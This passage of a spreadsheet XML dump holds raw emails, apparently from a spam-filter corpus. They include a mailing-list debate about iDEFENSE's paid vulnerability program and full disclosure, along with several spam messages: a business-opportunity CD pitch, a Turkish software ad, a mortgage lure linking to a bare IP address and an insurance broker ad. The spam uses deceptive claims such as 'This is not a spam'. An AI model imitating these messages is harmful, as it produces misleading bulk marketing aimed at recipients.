 Ideas!)&amp;nbsp; &lt;BR&gt;&lt;BR&gt;Search Engines&amp;nbsp; &lt;BR&gt;&lt;BR&gt;Webmaster Tools&amp;nbsp; =
 &lt;BR&gt;&lt;BR&gt;Simple Plug n' Play installation a 2 year old could do!&amp;nbsp;=20
 &lt;BR&gt;&lt;BR&gt;and MUCH more... &lt;BR&gt;&lt;BR&gt;Get the CD ROM and Become an=20
 Associate!&lt;BR&gt;&lt;BR&gt;Associates are eligible to receive $25 commissions=20
 on&lt;BR&gt;&lt;BR&gt;the sale of each CD.&lt;BR&gt;&lt;BR&gt;Specifically, Our BizOpp Gold CD =
 Software=20
 Includes:&lt;BR&gt;&lt;BR&gt;Ads &amp;amp; Ideas &lt;BR&gt;&lt;BR&gt;1000's of Links &lt;BR&gt;&lt;BR&gt;Working =
 Email=20
 Folders &lt;BR&gt;&lt;BR&gt;Submission Ideas &lt;BR&gt;&lt;BR&gt;Contact Information =
 &lt;BR&gt;&lt;BR&gt;Personal=20
 Tagging &lt;BR&gt;&lt;BR&gt;Program Site Links &lt;BR&gt;&lt;BR&gt;1000's of Classified Ad Sites =
 &lt;BR&gt;&lt;BR&gt;Online Virus Scan &lt;BR&gt;&lt;BR&gt;PayPal Access &lt;BR&gt;&lt;BR&gt;Email Program =
 Links=20
 &lt;BR&gt;&lt;BR&gt;Webmaster Tools &lt;BR&gt;&lt;BR&gt;Incoming Mail Folders &lt;BR&gt;&lt;BR&gt;Source =
 Codes=20
 &lt;BR&gt;&lt;BR&gt;HTML Editors &lt;BR&gt;&lt;BR&gt;Search Engines &lt;BR&gt;&lt;BR&gt;Help Desk =
 &lt;BR&gt;&lt;BR&gt;Tracking=20
 System Preview &lt;BR&gt;&lt;BR&gt;Opt-in List System Preview &lt;BR&gt;&lt;BR&gt;Easy Plug and =
 Play=20
 Installation &lt;BR&gt;&lt;BR&gt;And Much, Much More... &lt;BR&gt;&lt;BR&gt;Cost for this =
 BIZ-OPP GOLD=20
 SMART CD is only $49.97 (Plus $6.79 shipping&lt;BR&gt;and handling for =
 US/Canada or=20
 $11.79 for International shipments!)&lt;BR&gt;&lt;BR&gt;The Business Opportunity =
 Alliance=20
 Research and Development team will be&lt;BR&gt;working to provide the most =
 advanced=20
 and up to date marketing software and&lt;BR&gt;marketing techniques for =
 consumers of=20
 the CD and have a top Programming team&lt;BR&gt;to configure upgrades to the =
 software=20
 which will be downloadable via the&lt;BR&gt;internet for only $1.00 USD per=20
 month.&lt;BR&gt;&lt;BR&gt;For more information, please click here &lt;A=20
 href=3D"http://www.promoneymail.com/member1849"&gt;http://www.promoneymail.c=
 om/member1849&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;This=20
 is not a spam - we have had contact in the past,&amp;nbsp; for removal from =
 my list=20
 email &lt;A href=3D"mailto:ardi8@lycos.com"&gt;ardi8@lycos.com&lt;/A&gt; with Remove =
 in the=20
 subject box.&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_005D_01C1BE1C.740AA160--
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kragen,
    This is an interesting analysis.  I think that there are a couple
 of nits I might pick (for example, I don't expect that the market will
 be well developed with highest bidders for while), I think that the
 most important issue, which is that end users won't be able to fix
 their systems, is almost passed over.  I know that you know this, and
 you allude to it, but your essay is getting passed around, so you
 might want to add to it bits about the sysadmin and others.
    There's one other point which you don't make, which I think is very
 important, which is that research into defining and addressing classes
 of vulnerabilities can't happen without libraries of available
 vulnerability code.  I can think of three researchers into automated
 methods for addressing vulnerabilities who griped, uninvited, about
 the quality of the existing vulnerability sites.  Doing research into
 a set requires that you have enough examples, in the open, that you
 can define a set, and that the set is added to from time to time so
 you can make and test predictions.
    I feel fairly confident in saying that without full disclosure, we
 wouldn't have Stackguard, ITS4, Nissus, or snort.  And the security
 admin's job would be a lot harder.
 Adam
 On Thu, Aug 22, 2002 at 08:42:12AM +0200, Eugen Leitl wrote:
 | -- 
 | -- Eugen* Leitl &lt;a href="http://leitl.org"&gt;leitl&lt;/a&gt;
 | ______________________________________________________________
 | ICBMTO: N48 04'14.8'' E11 36'41.2'' http://eugen.leitl.org
 | 83E5CA02: EDE4 7193 0833 A96B 07A7  1A88 AA58 0E89 83E5 CA02
 | 
 | 
 | ---------- Forwarded message ----------
 | Date: Thu, 22 Aug 2002 00:24:54 -0400 (EDT)
 | From: Kragen Sitaker &lt;kragen@pobox.com&gt;
 | To: fork@spamassassin.taint.org
 | Subject: the underground software vulnerability marketplace and its hazards
 | 
 | On August 7th, an entity known as "iDEFENSE" sent out an announcement,
 | which is appended to this email.  Briefly, "iDEFENSE", which bills
 | itself as "a global security intelligence company", is offering cash
 | for information about security vulnerabilities in computer software
 | that are not publicly known, especially if you promise not to tell
 | anyone else.
 | 
 | If this kind of secret traffic is allowed to continue, it will pose a
 | very serious threat to our computer communications infrastructure.
 | 
 | At the moment, the dominant paradigm for computer security research
 | known as "full disclosure"; people who discover security
 | vulnerabilities in software tell the vendor about them, and a short
 | while later --- after the vendor has had a chance to fix the problem
 | --- they publish the information, including code to exploit the
 | vulnerability, if possible.  
 | 
 | This method has proven far superior to the old paradigm established by
 | CERT in the late 1980s, which its proponents might call "responsible
 | disclosure" --- never release working exploit code, and never release
 | any information on the vulnerability before all vendors have released
 | a patch.  This procedure often left hundreds of thousands of computers
 | vulnerable to known bugs for months or years while the vendors worked
 | on features, and often, even after the patches were released, people
 | wouldn't apply them because they didn't know how serious the problem
 | was.
 | 
 | The underground computer criminal community would often discover and
 | exploit these same holes for months or years while the "responsible
 | disclosure" process kept their victims, who had no connections in the
 | underground, vulnerable.
 | 
 | The problem with this is that vulnerabilities that are widely known
 | are much less dangerous, because their victims can take steps to
 | reduce their potential impact --- including disabling software,
 | turning off vulnerable features, filtering traffic in transit, and
 | detecting and responding to intrusions.  They are therefore much less
 | useful to would-be intruders.  Also, software companies usually see
 | security vulnerabilities in their software as PR problems, and so
 | prefer to delay publication (and the expense of fixing the bugs) as
 | long as possible.
 | 
 | iDEFENSE is offering a new alternative that appears far more dangerous
 | than either of the two previous paradigms.  They want to be a buyer in
 | a marketplace for secret software vulnerability information, rewarding
 | discoverers of vulnerabilities with cash.  
 | 
 | Not long before, Snosoft, a group of security researchers evidently
 | including some criminal elements, apparently made an offer to sell the
 | secrecy of some software vulnerability information to the software
 | vendor; specifically, they apparently made a private offer to
 | Hewlett-Packard to keep a vulnerability in HP's Tru64 Unix secret if
 | HP retained Snosoft's "consulting services".  HP considered this
 | extortion and responded with legal threats, and Snosoft published the
 | information.
 | 
 | If this is allowed to happen, it will cause two problems which,
 | together, add up to a catastrophe.
 | 
 | First, secret software vulnerability information will be available to
 | the highest bidder, and to nobody else.  For reasons explained later,
 | I think the highest bidders will generally be organized crime
 | syndicates, although that will not be obvious to the sellers.
 | 
 | Second, finding software vulnerabilities and keeping them secret will
 | become lucrative for many more talented people.  The result will be
 | --- just as in the "responsible disclosure" days --- that the good
 | guys will remain vulnerable for months and years, while the majority
 | of current vulnerabilities are kept secret.
 | 
 | I've heard it argued that the highest bidders will generally be the
 | vendors of the vulnerable software, but I don't think that's
 | plausible.  If someone can steal $20 000 because a software bug lets
 | them, the software vendor is never held liable; often, in fact, the
 | people who administer the software aren't liable, either --- when
 | credit card data are stolen from an e-commerce site, for example.
 | Knowing about a vulnerability before anyone else might save a web-site
 | administrator some time, and it might save the software vendor some
 | negative PR, but it can net the thief thousands of dollars.
 | 
 | I think the highest bidders will be those for whom early vulnerability
 | information is most lucrative --- the thieves who can use it to
 | execute the largest heists without getting caught.  Inevitably, that
 | means organized crime syndicates, although the particular gangs who
 | are good at networked theft may not yet exist.
 | 
 | There might be the occasional case where a market leader, such as
 | Microsoft, could make more money by giving their competitors bad PR
 | than a gang could make by theft.  Think of a remote-root hole in
 | Samba, for example.
 | 
 | Right now, people who know how to find security exploits are either
 | motivated by personal interest in the subject, motivated by the public
 | interest, motivated by a desire for individual recognition, or
 | personally know criminals that benefit from their exploits.  Creating
 | a marketplace in secret vulnerability information would vastly
 | increase the availability of that information to the people who can
 | afford to pay the most for it: spies, terrorists, and organized crime.
 | 
 | Let's not let that happen.
 | 
 | 
 | 
 | 
 | This is the original iDEFENSE announcement:
 | 
 | From: Sunil James [mailto:SJames@iDefense.com]
 | Sent: Wednesday, August 07, 2002 12:32 PM
 | Subject: Introducing iDEFENSE's Vulnerability Contributor Program
 | 
 | 
 | Greetings,
 | 
 | iDEFENSE is pleased to announce the official launch of its Vulnerability
 | Contributor Program (VCP). The VCP pays contributors for the advance
 | notification of vulnerabilities, exploit code and malicious code.
 | 
 | iDEFENSE hopes you might consider contributing to the VCP. The following
 | provides answers to some basic questions about the program:
 | 
 | Q. How will it work?
 | A. iDEFENSE understands the majority of security researchers do not publish
 | security research for compensation; rather, it could be for any of a number
 | of motivations, including the following:
 | 
 |          * Pure love of security research
 |          * The desire to protect against harm to targeted networks
 |          * The desire to urge vendors to fix their products
 |          * The publicity that often accompanies disclosure
 | 
 | The VCP is for those who want to have their research made public to the
 | Internet community, but who would also like to be paid for doing the
 | work.The compensation will depend, among other things, on the following
 | items:
 | 
 |          * The kind of information being shared (i.e. vulnerability or exploit)
 |          * The amount of detail and analysis provided
 |          * The potential severity level for the information shared
 |          * The types of applications, operating systems, and other
 |            software and hardware potentially affected
 |          * Verification by iDEFENSE Labs
 |          * The level of exclusivity, if any, for data granted to iDEFENSE
 | 
 | Q. Who should contribute to the VCP?
 | A. The VCP is open to any individual, security research group or other
 | entity.
 | 
 | Q. Why are you launching this program?
 | A. Timeliness remains a key aspect in security intelligence. Contributions
 | to some lists take time before publication to the public at large. More
 | often, many of these services charge clients for access without paying the
 | original contributor. Under the iDEFENSE program, the contributor is
 | compensated, iDEFENSE Labs verifies the issue, and iDEFENSE clients and the
 | public at large are warned in a timely manner.
 | 
 | Q. Who gets the credit?
 | A. The contributor is always credited for discovering the vulnerability or
 | exploit information.
 | 
 | Q. When can I contribute?
 | The VCP is active. You are welcome to begin contributing today.
 | 
 | To learn more, go to http://www.idefense.com/contributor.html. If you have
 | questions or would like to sign up as a contributor to the VCP, please
 | contact us at contributor@idefense.com.
 | 
 | Regards,
 | 
 | Sunil James
 | Technical Analyst
 | iDEFENSE
 | 
 | "iDEFENSE is a global security intelligence company that proactively
 | monitors sources throughout the world -- from technical vulnerabilities and
 | hacker profiling to the global spread of viruses and other malicious code.
 | The iALERT security intelligence service provides decision-makers, frontline
 | security professionals and network administrators with timely access to
 | actionable intelligence and decision support on cyber-related threats.
 | iDEFENSE Labs is the research wing that verifies vulnerabilities, examines
 | the behavior of exploits and other malicious code and discovers new
 | software/hardware weaknesses in a controlled lab environment."
 | 
 | http://xent.com/mailman/listinfo/fork
 | 
 -- 
 "It is seldom that liberty of any kind is lost all at once."
 					               -Hume
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=white&gt;
 &lt;table&gt;
 &lt;tr&gt;
    &lt;td&gt;
    &lt;center&gt;&lt;br&gt;
    &lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;     &lt;/center&gt;&lt;/B&gt;
    &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P align=center&gt;&lt;FONT  color=white size =7 &gt;&lt;STRONG&gt;
 &lt;TABLE cellSpacing=1 cellPadding=1 width="501" border=5 style="WIDTH: 501px; HEIGHT: 907px"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG alt="" 
       src="http://www.bilsag.com/web1.jpg"&gt;&lt;/TD&gt;
     &lt;TD bgcolor=red&gt;&lt;FONT size=4
       color=white&gt;&lt;EM&gt;&lt;STRONG&gt;NTERNETTE KENDNZ DAHA Y HSSEDECEKSNZ.
 	  NGLZCE WEB SAYFALARININ TRKE'YE EVR YAZILIMI
 	   &lt;/STRONG&gt;&lt;/EM&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
   &lt;TD bgcolor=palegoldenrod&gt;&lt;FONT size=7 
       color=darkblue&gt;&lt;EM&gt;&lt;STRONG&gt;$ 39+KDV&lt;/STRONG&gt;&lt;/EM&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD  &gt;&lt;IMG alt="" 
       src="http://www.bilsag.com/cev1.jpg"&gt;&lt;/TD&gt;
     &lt;TD bgcolor=red&gt;&lt;FONT size=4
       color=white&gt;&lt;STRONG&gt;&lt;EM&gt; NGLZCE'DEN TRKE'YE BLGSAYAR DESTEKL
 	    METN EVR YAZILIMI  
 	 (MS-WORD ALTINDA KULLANIM, TM WINDOWS VERSYONLARI LE UYUMLU)
 	  &lt;/EM&gt;&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
   &lt;TD bgcolor=palegoldenrod&gt;&lt;FONT size=7 
       color=darkblue&gt;&lt;STRONG&gt;&lt;EM&gt;$ 69+KDV&lt;/EM&gt;&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgcolor=darkblue&gt;&lt;FONT size=6 color=white&gt;&lt;STRONG&gt;&lt;EM&gt;K YAZILIM &amp;nbsp; BRLKTE&lt;/FONT&gt;&lt;/EM&gt;    &lt;/STRONG&gt;&lt;/TD&gt;
     &lt;TD bgcolor=darkblue&gt;&lt;FONT size=7 
       color=white&gt;&lt;STRONG&gt;&lt;EM&gt;$ 
   89+KDV&lt;/EM&gt;&lt;/STRONG&gt; 
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;STRONG&gt;&lt;a href="http://www.bilsag.com/index.html"&gt;&lt;FONT color=darkcyan size=2&gt;Ayrntl Bilgi 
       in&amp;nbsp; &lt;/FONT&gt;&lt;/STRONG&gt;&lt;STRONG&gt;&lt;FONT 
       color=darkcyan size=2&gt;  tklayn&lt;/FONT&gt;&lt;/A&gt;&lt;/STRONG&gt; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/P&gt;
       &lt;P align=center&gt;
       &amp;nbsp;&lt;A href="http://www.bilsag.com/siparis.htm"&gt;&lt;IMG alt="" src="http://www.bilsag.com/sipbuton.gif" border=0
       &gt;&lt;/A&gt; &lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;BLSAG Ltd.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;AHMET MTHAT 
       EFEND SOK. 22/1 ANKAYA 06700 / ANKARA /&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;&lt;FONT 
       size=+0&gt;Tlf: 0312. 439 2850/ Fax: 0312. 439 9347&lt;/FONT&gt; 
       &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;A href="mailto:bilsag@msn.com"&gt;&lt;FONT color=#ff0000 
       size=3&gt;&lt;STRONG&gt;bilsag@msn.com&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
     &lt;TD&gt;
       &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
       &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;form action="http://www.bilsag.com/iptal1.asp" method="post"&gt;
 &lt;center&gt;
 &lt;TABLE WIDTH="540" CELLSPACING=1 CELLPADDING=1 BORDER=0 bgcolor="#dddddd"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#eeeeee" align="middle"&gt;&lt;FONT FACE="Verdana, Arial" SIZE="-1" COLOR="#000000"&gt;
 &lt;strong&gt;E-posta adres listemizden&lt;/strong&gt; kmak iin&lt;strong&gt;IKAR&lt;/strong&gt; tuuna basnz
 &lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#eeeeee" align="middle"&gt;
 &lt;INPUT NAME="e" VALUE="webmake-talk@lists.sourceforge.net" SIZE=25 
      &gt;&lt;/FONT&gt;                   
 &lt;INPUT TYPE="submit" VALUE="kar"&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#ffffff" align=right&gt;
 &lt;FONT FACE="arial" SIZE="1" COLOR="#000000"&gt;Bu elektronik posta: webmake-talk@example.sourceforge.net e gnderilmitir&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/center&gt;
 &lt;/form&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Got a Mortgage? 6.25 30 yr Fixed Free Instant Quote yuf
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="539" border="0" style="border:12px double #006600; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="4" height="423"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-collapse: collapse" bordercolor="#111111"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#000000"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Dear 
               Homeowner,&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
 &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;
               *&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000"&gt;6.25% 
               30 Yr Fixed Rate Mortgage&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Interest 
               rates are at their lowest point in 40 years! We help you find the 
               best rate for your situation by matching your needs with hundreds 
               of lenders! &lt;b&gt;Home Improvement&lt;/b&gt;, &lt;b&gt;Refinance&lt;/b&gt;, &lt;b&gt;Second 
               Mortgage&lt;/b&gt;, &lt;b&gt;Home Equity Loans, and More! &lt;/b&gt;Even with less 
               than perfect credit! &lt;/font&gt;
             &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="504" border="0" style="position: relative; border-collapse: collapse" bordercolor="#111111" height="1"&gt;
           &lt;tr&gt;
             &lt;td vAlign="top" width="325" height="1"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;br&gt;
               &lt;/a&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=b34"&gt;Click Here for a Free Quote!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=A11"&gt;
               &lt;/a&gt;
             &lt;/div&gt;
             &lt;p&gt;&lt;b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Lock 
             In YOUR LOW FIXED RATE TODAY&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;dl&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;NO 
               COST OUT OF POCKET&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;NO 
               OBLIGATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;FREE 
               CONSULTATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;ALL 
               CREDIT GRADES ACCEPTED&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
             &lt;/dl&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana,Arial,Helvetica,sans-serif" color="red" size="2"&gt;
               &lt;b&gt;
               &lt;a href="http://66.231.133.63/index.html?ID=b34"&gt;Rates as low as 
               6.25% won't stay this low forever CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               &lt;b&gt;
             &lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;
               * based on mortgage rate as of 5-15-02 as low as 6.25% see lender 
               for details&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td vAlign="top" width="4" height="1"&gt;
             &lt;div align="right"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width="175" height="1" bgcolor="#FFFFFF" bordercolor="#006600"&gt;
             &lt;h1&gt;&lt;span style="vertical-align: middle"&gt;
             &lt;font face="Webdings" style="font-size: 200" color="#006600"&gt;
             &lt;a href="http://66.231.133.63/index.html?ID=b34"&gt;
             &lt;font color="#006600"&gt;H&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/h1&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="472" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64"&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Apply 
                 now and one of our lending partners will get back to you within 
                 48 hours.&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;&lt;/td&gt;
                 &lt;/font&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.63/index.html?ID=b34"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
             &lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;To Be Removed Please &amp;quot;&lt;a href="http://66.231.133.63/final/index_remoov.html?ID=b34"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_266701_01C22CE6.6C78C6F0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  PruLife Universal Protector
  - and -
  Prulife Universal Plus
   ROCK!
 Case Closed! Permanent Life Insurance at Affordable Rates
 Whether your clients are looking to pay the Minimum Premiums needed to
 Endow* a policy at a specific age or pay sufficient premiums needed to
 guarantee** a death benefit for
 life, Prudential has the answer.
 PruLife Universal ProtectorSM offers competitive lifetime death benefit
 guarantee premiums. PruLife Universal PlusSM offers competitive minimum
 premiums to endow and competitive long term cash value accumulation.
 And that's not all. Look what else Prudential+ has to offer...
   _____  
 COMPETITIVE COMPENSATION	 
  	 Rolling Commissionable Target Premiums (R-CTP)++.
 First year compensation will be paid until the R-CTP is reached during
 the first 24 policy months. 	
  	 First year commissions that do not reduce at any issue age. 	
  COMPETITIVE UNDERWRITING	 
  	 Issue ages 0-90	 
  	 Continuation of coverage beyond age 100 (policy has no maturity
 age).	 
  	 Preferred Non-Smoker category for cigar smokers, pipe smokers
 and smokeless tobacco users (nicotine patch and gum users also may be
 eligible if they have not smoked cigarettes in the last 12 months) 	
  	 Preferred Plus Smoker category for healthy Cigarette Smokers.
  	 Aviation: Preferred rates may be offered to commercial pilots
 and most student and private pilots who fly up to 200 hours per year,
 regardless of whether helicopters or fixed wing aircraft are flown. 	
  	 Treadmills not required for preferred rates for face amounts
 within our capacity limits	 
  	 Improved Ratings for Prostate Cancer, Hepatitis B &amp; C	 
  	 Heart attack? Consider Prudential as soon as the prospect
 returns to normal activities	 
  	 Liberal Build Tables to qualify for Preferred rates	 
 INCREASED CAPACITY	 
  	 $70 million capacity without the need to discuss a risk with
 reinsurers.	 
  	 Facultative reinsurance may be available for cases in excess of
 $70 million.	 
   _____  
 Click our logo for the BGA nearest you!
 Click here for the NBC BGA Locator!
 &lt;http://www.insiq.com/resdir/special/nbc/&gt; 
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	 	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
  National Brokerage Consortium
 * Minimum Premium to Endow is a hypothetical, non-guaranteed premium
 that, based on current charges and the current interest rate, would keep
 the policy in force to age 100. Interest rates and charges will change
 over time, as will the Minimum Premium to Endow. These premiums are
 shown as hypothetical figures based on the stated assumptions and are
 shown for comparative purposes only. The actual premium needed to keep
 the policy in force is based on actual results and may be higher or
 lower. ** All guarantees are based on the claims-paying ability of the
 issuer. 
 + PruLife Universal Protector is issued by Pruco Life Insurance Company.
 PruLife Universal Plus also is issued by Pruco Life Insurance Company in
 all states except New Jersey and New York, where it is issued by Pruco
 Life Insurance Company of New Jersey, both Prudential Financial, Inc.
 companies located at 213 Washington Street, Newark, NJ 07102-2992. Each
 is solely responsible for its own financial condition and contractual
 obligations. 
 ++ Available on contracts dated Jan. 1, 2002 &amp; later. Not available in
 New York &amp; New Jersey.
 Prudential Financial is a service mark of The Prudential Insurance
 Company of America, Newark, NJ and its affiliates. For financial
 professional use only. Not for use with the public. 
 IFS-A072238 Ed. 7/2002 Exp. 12/2003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------=_NextPart_000_266701_01C22CE6.6C78C6F0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
